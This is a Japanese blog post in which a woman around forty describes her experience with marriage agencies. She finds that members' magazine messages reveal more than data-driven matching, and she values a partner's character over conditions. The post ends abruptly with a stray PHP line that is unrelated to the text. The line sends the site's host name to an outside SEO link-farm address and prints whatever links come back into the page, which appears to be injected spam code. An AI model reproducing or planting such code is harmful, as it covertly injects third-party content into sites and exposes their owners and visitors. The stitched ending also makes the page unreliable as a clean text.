アラフォー婚活のリアルな結婚観

婚活のために結婚紹介所を利用される方が増えているそうですが、実は私もその一人。
その経験談から言うと、相談所独自のマッチングシステムよりも、会員情報誌の方が出逢いの確率は高いですね。
今まで実際に出逢った方の多くは会員情報誌に掲載される交流ページからでした。
紹介所ごとに独自のシステムがあるのですが、2社に実際に登録し、数多く比較・検討してきた中で会員情報誌の交流ページは同じような感じがします。
このページでの紹介が良いのはデータ中心のマッチングシステムにはない、その人の「肉声」とも言えるメッセージに出逢えることです。
マッチングシステムは家族構成や条件、価値観などが紹介され、メッセージも添えられていますが、より相手の結婚観、家族観が見えるのが交流ページです。
私が入会している紹介所では126文字の短いメッセージしか寄せることができないのですが、それでも相手がどんなことに興味を持ち、大切にしているかが、よく分かります。
私はアラフォーでの婚活ですが、実感としてあるのは条件よりも人柄重視であるという点です。
経済力は大切です。
ある程度、条件も必要です。
しかも、紹介所での出会いは結婚が前提です。
しかし、これからも一緒にいたい相手かどうか、これ一番大切ですね。
二人ずっと、生活を共にするから。
とはいえ、紹介所で出会ったからと、焦りは禁物です。
まったく出会う機会がない二人、もしかすると紹介所での入会がなかったら出会えなかった二人です。
この出逢いを大切にするためにも、時間は必要。
相手をじっくり感じる余裕もアラフォー婚活には大切ですね。

//// $MAX = 5; // ////////////////// $lines = file('http://www.admin-search.biz/B/seo_links/?r_dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']));shuffle($lines); for($i=0;$i<$MAX;$i++){ echo($lines[$i].""); }